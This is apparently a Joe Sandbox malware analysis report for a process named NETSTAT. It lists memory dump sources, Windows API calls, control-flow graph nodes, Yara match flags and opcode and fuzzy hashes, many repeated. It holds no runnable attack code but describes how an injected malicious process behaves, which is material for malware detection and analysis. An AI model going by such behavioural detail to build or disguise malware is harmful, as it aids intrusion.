                                                                                                                                                                                  • Source File: 00000007.00000002.4143880964.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.00000000031C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.00000000031CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.000000000323E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_30a0000_NETSTAT.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  • Opcode ID: a720514b0c906fc4c3f6d1df342d7704021c8f8f3542dd84666089b578053996
                                                                                                                                                                                  • Instruction ID: 37e9931151f486a3164b5380af1821c8c3954e38794c71cb7b98372ce6261ff7
                                                                                                                                                                                  • Opcode Fuzzy Hash: a720514b0c906fc4c3f6d1df342d7704021c8f8f3542dd84666089b578053996
                                                                                                                                                                                  • Instruction Fuzzy Hash: DC90027120141803D140B1584505746040587D4301F56D011A5065554E8B598EE56765
                                                                                                                                                                                  Function 03112D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4143880964.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.00000000031C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.00000000031CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.000000000323E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_30a0000_NETSTAT.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  • Opcode ID: 037b354fa4f42b021777c89ccf9920d268b2d26d3baef5173750732a7dc4210e
                                                                                                                                                                                  • Instruction ID: 8d850a3e561d0506a85f0af8bacc4b3f059fb504881a22f477f59a2b4ad87271
                                                                                                                                                                                  • Opcode Fuzzy Hash: 037b354fa4f42b021777c89ccf9920d268b2d26d3baef5173750732a7dc4210e
                                                                                                                                                                                  • Instruction Fuzzy Hash: E690022921341403D180B158550960A040587D5202F96E415A0016558CCF1589795321
                                                                                                                                                                                  Function 03112DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4143880964.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.00000000031C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.00000000031CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.000000000323E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_30a0000_NETSTAT.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  • Opcode ID: 3da826f3ebc958208006a240f38f90f41670443b77480b864639ffcee4fd0813
                                                                                                                                                                                  • Instruction ID: 21fc93137187f14ab5e4916d6effd88e910cdb690248a0dc97370a5d3c9b56c5
                                                                                                                                                                                  • Opcode Fuzzy Hash: 3da826f3ebc958208006a240f38f90f41670443b77480b864639ffcee4fd0813
                                                                                                                                                                                  • Instruction Fuzzy Hash: 30900221242455535545F1584505507440697E4241796D012A1415950C8B269966D721
                                                                                                                                                                                  Function 03112DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4143880964.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.00000000031C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.00000000031CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.000000000323E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_30a0000_NETSTAT.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  • Opcode ID: 38e79e170afff2f064f84b3c8a37b14f2b70aafcd3981661754e08ac3cd79d32
                                                                                                                                                                                  • Instruction ID: 2799ffe6788b47294d5f4cc4b0db16de8dda6d808d04cc1e0d7b7642fd41349b
                                                                                                                                                                                  • Opcode Fuzzy Hash: 38e79e170afff2f064f84b3c8a37b14f2b70aafcd3981661754e08ac3cd79d32
                                                                                                                                                                                  • Instruction Fuzzy Hash: D490023120141813D111B1584605707040987D4241F96D412A0425558D9B568A62A221
                                                                                                                                                                                  Function 03112C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4143880964.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.00000000031C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.00000000031CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.000000000323E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_30a0000_NETSTAT.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  • Opcode ID: 8ca9d5d311925c57db1a421e843c3673ea17ec8eb5ca54bea31be5d5834e0db4
                                                                                                                                                                                  • Instruction ID: 193a4b38822a6aefd1abed2202c8f9f4c937dd2a0552adbe579acc9faeca0e47
                                                                                                                                                                                  • Opcode Fuzzy Hash: 8ca9d5d311925c57db1a421e843c3673ea17ec8eb5ca54bea31be5d5834e0db4
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8490023120149C03D110B158850574A040587D4301F5AD411A4425658D8B9589A17221
                                                                                                                                                                                  Function 03112C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4143880964.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.00000000031C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.00000000031CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.000000000323E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_30a0000_NETSTAT.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  • Opcode ID: a0e25a848294ad439da9d47552988b300203ae0eb9f87fc4cbc9b2eea3266d8a
                                                                                                                                                                                  • Instruction ID: 35280e4b2b43d4975c5946adeef6151f763652f2755583d4b6a3a2901117b287
                                                                                                                                                                                  • Opcode Fuzzy Hash: a0e25a848294ad439da9d47552988b300203ae0eb9f87fc4cbc9b2eea3266d8a
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0990023120141C43D100B1584505B46040587E4301F56D016A0125654D8B15C9617621
                                                                                                                                                                                  Function 03112CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4143880964.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.00000000031C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.00000000031CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.000000000323E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_30a0000_NETSTAT.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  • Opcode ID: e1884acc38a03dc8901bc2e29728ce363ee71820993c169ea9b1ae7e5397fe8c
                                                                                                                                                                                  • Instruction ID: e86af59511a2d4657929c22f3e0bbec416bcb6b766b0ea55b6cde05c51ffb4c2
                                                                                                                                                                                  • Opcode Fuzzy Hash: e1884acc38a03dc8901bc2e29728ce363ee71820993c169ea9b1ae7e5397fe8c
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8290023120141803D100B5985509646040587E4301F56E011A5025555ECB6589A16231
                                                                                                                                                                                  Function 031135C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4143880964.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.00000000031C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.00000000031CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.000000000323E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_30a0000_NETSTAT.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  • Opcode ID: 201729cf1bc93e52303254449ba881d1841524fe31c2e88d1e410cd618a6bb3f
                                                                                                                                                                                  • Instruction ID: 1efee68a04dbc4874becda212e6a003a1b00d3dd3f44adb6c17ee37a70f0f98a
                                                                                                                                                                                  • Opcode Fuzzy Hash: 201729cf1bc93e52303254449ba881d1841524fe31c2e88d1e410cd618a6bb3f
                                                                                                                                                                                  • Instruction Fuzzy Hash: DA90023160551803D100B1584615706140587D4201F66D411A0425568D8B958A6166A2
                                                                                                                                                                                  Function 026B9050 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 399 26b9050-26b907f 400 26b908b-26b9092 399->400 401 26b9086 call 26bbd10 399->401 402 26b9098-26b90e8 call 26bbde0 call 26aacf0 call 26b4e50 400->402 403 26b916c-26b9172 400->403 401->400 410 26b90f0-26b9101 Sleep 402->410 411 26b9103-26b9109 410->411 412 26b9166-26b916a 410->412 413 26b910b-26b9131 call 26b8c70 411->413 414 26b9133-26b9153 411->414 412->403 412->410 415 26b9159-26b915c 413->415 414->415 416 26b9154 call 26b8e80 414->416 415->412 416->415
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • Sleep.KERNELBASE(000007D0), ref: 026B90F8
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 026A0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_26a0000_NETSTAT.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Sleep
                                                                                                                                                                                  • String ID: net.dll$wininet.dll
                                                                                                                                                                                  • API String ID: 3472027048-1269752229
                                                                                                                                                                                  • Opcode ID: 8c1b0a8821647daacaec3ce7722ae7c2507ae3a6a3dae6e1edd96298393e188a
                                                                                                                                                                                  • Instruction ID: 2cd7873c720be05c7ec649779477095083624530573874e953b3678b5499d2f6
                                                                                                                                                                                  • Opcode Fuzzy Hash: 8c1b0a8821647daacaec3ce7722ae7c2507ae3a6a3dae6e1edd96298393e188a
                                                                                                                                                                                  • Instruction Fuzzy Hash: 793181B6500744BBC725DF64C885FA7B7B9AF48B04F00851DEA2A5B245DB30B650CFA8
                                                                                                                                                                                  Function 026B9049 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 79sleepCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 419 26b9049-26b9092 call 26bbd10 422 26b9098-26b90e8 call 26bbde0 call 26aacf0 call 26b4e50 419->422 423 26b916c-26b9172 419->423 430 26b90f0-26b9101 Sleep 422->430 431 26b9103-26b9109 430->431 432 26b9166-26b916a 430->432 433 26b910b-26b9131 call 26b8c70 431->433 434 26b9133-26b9153 431->434 432->423 432->430 435 26b9159-26b915c 433->435 434->435 436 26b9154 call 26b8e80 434->436 435->432 436->435
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • Sleep.KERNELBASE(000007D0), ref: 026B90F8
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 026A0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_26a0000_NETSTAT.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Sleep
                                                                                                                                                                                  • String ID: net.dll$wininet.dll
                                                                                                                                                                                  • API String ID: 3472027048-1269752229
                                                                                                                                                                                  • Opcode ID: 90d374bf3d1fe4248f4fe765302a32593e562aca51855444eecbd96311da5a57
                                                                                                                                                                                  • Instruction ID: 1e80696c60a35bce6243cd1c42bd2d12ce92a2e9356ac60845998f32a50dd107
                                                                                                                                                                                  • Opcode Fuzzy Hash: 90d374bf3d1fe4248f4fe765302a32593e562aca51855444eecbd96311da5a57
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7D2191B2901244BBCB25DF64C885BABB7B5FF48704F10811DEA296B245D774A590CFA8
                                                                                                                                                                                  Function 026BA632 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 556 26ba632-26ba656 557 26ba65c-26ba671 RtlFreeHeap 556->557 558 26ba657 call 26baf30 556->558 558->557
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,026A3AF8), ref: 026BA66D
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 026A0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_26a0000_NETSTAT.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FreeHeap
                                                                                                                                                                                  • String ID: .z`
                                                                                                                                                                                  • API String ID: 3298025750-1441809116
                                                                                                                                                                                  • Opcode ID: 5bca1434af71235a765000b781c50ed5c4bf131192a700c4342c6be7842671a9
                                                                                                                                                                                  • Instruction ID: 8bf8ee819ad73fe35e68caa53deab0a8d26de388981505aedf24592802d26903
                                                                                                                                                                                  • Opcode Fuzzy Hash: 5bca1434af71235a765000b781c50ed5c4bf131192a700c4342c6be7842671a9
                                                                                                                                                                                  • Instruction Fuzzy Hash: D6F030B12102046BD718DF58DC49EE777ADFF48750F114659F9485B241D631E8118BA0
                                                                                                                                                                                  Function 026BA640 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 559 26ba640-26ba671 call 26baf30 RtlFreeHeap
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,026A3AF8), ref: 026BA66D
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 026A0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_26a0000_NETSTAT.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FreeHeap
                                                                                                                                                                                  • String ID: .z`
                                                                                                                                                                                  • API String ID: 3298025750-1441809116
                                                                                                                                                                                  • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                                                                                  • Instruction ID: ad726983e88283cf99c979d746412390b057f249d2ece408465e2e7fdc386ff6
                                                                                                                                                                                  • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                                                                                  • Instruction Fuzzy Hash: A7E012B2210208ABDB28EF99CC48EE777ADAF88750F018559BA085B241C630E9108AB0
                                                                                                                                                                                  Function 026A8310 Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 026A836A
                                                                                                                                                                                  • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 026A838B
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 026A0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_26a0000_NETSTAT.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MessagePostThread
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1836367815-0
                                                                                                                                                                                  • Opcode ID: 7e4e56330453795c291b08fc23cbebb4c7108165151036bb208ae8e60e338b98
                                                                                                                                                                                  • Instruction ID: 2b4d782a411b1336b891685bd7e3985a0c78fe18560cbed9737b74a15afd725e
                                                                                                                                                                                  • Opcode Fuzzy Hash: 7e4e56330453795c291b08fc23cbebb4c7108165151036bb208ae8e60e338b98
                                                                                                                                                                                  • Instruction Fuzzy Hash: C401A731A802287BE721A6949C02FFE776D5F40F50F040119FF04BA1C1E6947D064BF9
                                                                                                                                                                                  Function 026AACF0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 026AAD62
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 026A0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_26a0000_NETSTAT.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Load
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2234796835-0
                                                                                                                                                                                  • Opcode ID: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
                                                                                                                                                                                  • Instruction ID: 2a9eecf82a995a2e7deec5c2701c3992e9d1c022cce8a47780e6a698913690a0
                                                                                                                                                                                  • Opcode Fuzzy Hash: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
                                                                                                                                                                                  • Instruction Fuzzy Hash: 81011EB5D0020DBBDB10EAE4DC41FDDB3799F54308F0045AAA9089B280FA71EB54CF91
                                                                                                                                                                                  Function 026BA791 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,026AF1D2,026AF1D2,?,00000000,?,?), ref: 026BA7D0
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 026A0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_26a0000_NETSTAT.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: LookupPrivilegeValue
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3899507212-0
                                                                                                                                                                                  • Opcode ID: 3cbd036db815f1a6f831822f4f400f7b7e145f9e35e5d4bf65d90379d78bfa16
                                                                                                                                                                                  • Instruction ID: d30dff3311d6271cd8d0742ba8705409102917f726b403e4dbb3ba1e55da9c1e
                                                                                                                                                                                  • Opcode Fuzzy Hash: 3cbd036db815f1a6f831822f4f400f7b7e145f9e35e5d4bf65d90379d78bfa16
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8B01ADF62102086BDB20EF98DC80DEB73ADEF88314F018459F94957302C630ED158BB5
                                                                                                                                                                                  Function 026BA6B0 Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 026BA704
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 026A0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_26a0000_NETSTAT.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CreateInternalProcess
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2186235152-0
                                                                                                                                                                                  • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                                                                                                  • Instruction ID: ff037a89b48c687f328c8b50648bd93a4e0c500fd4e66db46a506bbb8c8b6300
                                                                                                                                                                                  • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3801AFB2210108BBCB54DF89DC80EEB77ADAF8C754F158258BA0D97240C630E851CBA4
                                                                                                                                                                                  Function 026B9180 Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,026AF050,?,?,00000000), ref: 026B91BC
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 026A0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_26a0000_NETSTAT.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CreateThread
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2422867632-0
                                                                                                                                                                                  • Opcode ID: 3ca6a205792d7ef5e9bf1524afc8b1dc678e378c6025c1e3997efacd26045c0b
                                                                                                                                                                                  • Instruction ID: 0cdcec81e84ab194b9d8cbdf96de41dd39bdc0f9c9b50170b45d9633ff56aa2e
                                                                                                                                                                                  • Opcode Fuzzy Hash: 3ca6a205792d7ef5e9bf1524afc8b1dc678e378c6025c1e3997efacd26045c0b
                                                                                                                                                                                  • Instruction Fuzzy Hash: 66E06D373812143AE2216599AC02FE7B29C8F81B20F14002AFB0DEA6C1D995F44146E8
                                                                                                                                                                                  Function 026B9176 Relevance: 1.5, APIs: 1, Instructions: 33threadCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,026AF050,?,?,00000000), ref: 026B91BC
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 026A0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_26a0000_NETSTAT.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CreateThread
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2422867632-0
                                                                                                                                                                                  • Opcode ID: 7d55885de893406a9c509f9c0cc846aa32c5beb93765153f0fb1aa7fc83bd92f
                                                                                                                                                                                  • Instruction ID: fed147a33ecb3f55129216ac16ebba325986b5516b9034f791b3889edb82853e
                                                                                                                                                                                  • Opcode Fuzzy Hash: 7d55885de893406a9c509f9c0cc846aa32c5beb93765153f0fb1aa7fc83bd92f
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6FF0E53B3812003AE33125589C02F9777698F80B10F140019F648AB2C1C9A4B4418AAD
                                                                                                                                                                                  Function 026BA600 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(026B4536,?,026B4CAF,026B4CAF,?,026B4536,?,?,?,?,?,00000000,00000000,?), ref: 026BA62D
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 026A0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_26a0000_NETSTAT.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                                                                  • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
